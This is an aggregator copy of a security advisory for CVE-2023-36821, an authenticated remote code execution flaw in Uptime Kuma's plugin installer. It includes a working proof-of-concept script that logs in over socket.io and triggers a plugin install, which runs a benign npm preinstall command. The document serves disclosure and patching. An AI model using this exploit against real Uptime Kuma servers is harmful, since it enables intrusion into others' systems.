Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS03Z3J4LWY5NDUtbWo5Ns4AA7cr
Uptime Kuma vulnerable to authenticated remote code execution via malicious plugin installation
Summary
Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker.
Details
Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login.
After downloading a plugin, it's installed by calling npm install
in the installation directory of the plugin:
https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216
Because the plugin is not validated against the official list of plugins or installed with npm install --ignore-scripts
, a maliciously crafted plugin taking advantage of npm scripts can gain remote code execution.
PoC
In the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty index.js
and a package.json
containing the script: "preinstall": "echo \"Malicious code could have been executed as user $(whoami)\" > /tmp/poc"
. This will be executed when installing the plugin.
- Start Uptime Kuma:
docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1
- Create a user using the Uptime Kuma web interface, e.g. user
admin
with passwordadmin123
- Confirm that the PoC file to be created doesn't exist yet:
➜ ~ docker exec -it uptime-kuma cat /tmp/poc
cat: /tmp/poc: No such file or directory
- Create file
poc.js
with the following content:
SERVER = "ws://localhost:3001";
USERNAME = "admin";
PASSWORD = "admin123";
const { io } = require("socket.io-client");
const socket = io(SERVER);
const repo = "https://github.com/n-thumann/npm-install-script-poc";
const name = "npm-install-script-poc";
socket.emit(
"login",
{ username: USERNAME, password: PASSWORD, token: "" },
(res) => {
if (res.ok !== true) return console.log("Login failed");
console.log("Login successful");
socket.emit("installPlugin", repo, name, () => {
console.log("Done");
socket.close();
});
}
);
- Install
socket.io-client
:npm install socket.io-client
- Run the script:
node poc.js
:
# node poc.js
Login successful
Done
- The PoC file has been created:
➜ ~ docker exec -it uptime-kuma cat /tmp/poc
Malicious code could have been executed as user root
Impact
This vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.
Permalink: https://github.com/advisories/GHSA-7grx-f945-mj96JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Z3J4LWY5NDUtbWo5Ns4AA7cr
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 7 months ago
Updated: 7 months ago
CVSS Score: 8.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-7grx-f945-mj96, CVE-2023-36821
References:
- https://github.com/louislam/uptime-kuma/security/advisories/GHSA-7grx-f945-mj96
- https://nvd.nist.gov/vuln/detail/CVE-2023-36821
- https://github.com/louislam/uptime-kuma/pull/3346
- https://github.com/louislam/uptime-kuma/commit/a0736e04b2838aae198c2110db244eab6f87757b
- https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216
- https://github.com/louislam/uptime-kuma/releases/tag/1.22.1
- https://github.com/advisories/GHSA-7grx-f945-mj96
Blast Radius: 1.0
Affected Packages
npm:uptime-kuma
Dependent packages: 0Dependent repositories: 0
Downloads: 29 last month
Affected Version Ranges: <= 1.22.0
Fixed in: 1.22.1
All affected versions:
All unaffected versions: